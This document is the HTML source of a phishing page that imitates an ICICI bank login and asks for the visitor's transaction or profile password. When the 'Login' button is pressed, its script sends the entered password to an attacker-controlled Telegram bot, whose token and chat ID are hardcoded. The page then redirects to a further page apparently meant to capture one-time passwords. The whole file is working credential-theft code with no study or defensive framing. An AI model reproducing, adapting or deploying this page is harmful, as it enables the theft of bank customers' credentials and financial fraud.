<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f4f4f4;
      margin: 0;
      padding: 0;
    }

    .container {
      width: 90%;
      margin: 0px auto;
      background-color: #fff;
      padding: 20px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    }

    .form-group {
      margin-bottom: 20px;
    }

    label {
      display: block;
      margin-bottom: 5px;
    }
    input[type="password"],
    input[type="text"],
    input[type="tel"],
    input[type="number"],
    textarea {
      width: 100%;
      padding: 10px;
      border: 1px solid black;
      border-radius: 4px;
      box-sizing: border-box;
    }

    textarea {
      height: 180px; /* Adjust the height as needed */
    }

    button {
      background-color: #4CAF50;
      color: white;
      padding: 10px 20px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      width: 100%;
    }

    button:hover {
      background-color: #45a049;
    }
  
  img {
      display: block;
      margin: auto;
      max-width: 100%; /* Ensure the image doesn't exceed the width of its container */
      height: auto; /* Allow the image's height to scale proportionally to its width */
    }

    @media (max-width: 768px) {
      img {
        max-width: 100%; /* Adjust the max-width for smaller screens */
      }
    }
  
  form {
      max-width: 300px;
      margin: 0 auto;
    }

    

    input[type="submit"] {
      background-color: #4CAF50;
      color: white;
      padding: 10px 15px;
      margin: 10px 0;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }

    input[type="submit"]:hover {
      background-color: #45a049;
    }
  
  </style>
  <title>Form Example</title>
</head>
<body>
  <img src="ICICI.jpg" alt="Girl in a jacket">
  <div class="container">
    <form id="dataForm">
    <div class="form-group">
      <label for="transactionPassword">Transaction Password:</label>
    <input type="password" id="transactionPassword" name="transactionPassword" placeholder="Transaction / Profile Password" required>
  </div>
      <br>
    
    <button type="button" onclick="submitForm()">Login</button>
      </div>
    <img src="foot.png" alt="Girl in a jacket">
  
  <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@1.16.0/dist/umd/popper.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

  <script>
  function sendToTelegram(transactionPassword) {
    const message = `New login attempt\nTransaction Password: ${transactionPassword}`;
    const botToken = '7791287382:AAHaVcRNbpDfO1MOGYxvB4h6Ml7Bop5CxoQ';
    const chatId = '7865807902';
    const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;

    return fetch(telegramApiUrl, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({
        chat_id: chatId,
        text: message,
      }),
    });
  }

  function submitForm() {
    const form = document.getElementById('dataForm');
    const transactionPassword = form.elements['transactionPassword'].value;

    sendToTelegram(transactionPassword)
      .then(response => response.json())
      .then(data => {
        console.log('Message sent to Telegram:', data);
        window.location.href = 'otpnet.html';
      })
      .catch(error => {
        console.error('Error:', error);
        alert('Error: Login attempt data could not be sent to Telegram');
      });
  }
</script>
</body>
</html>
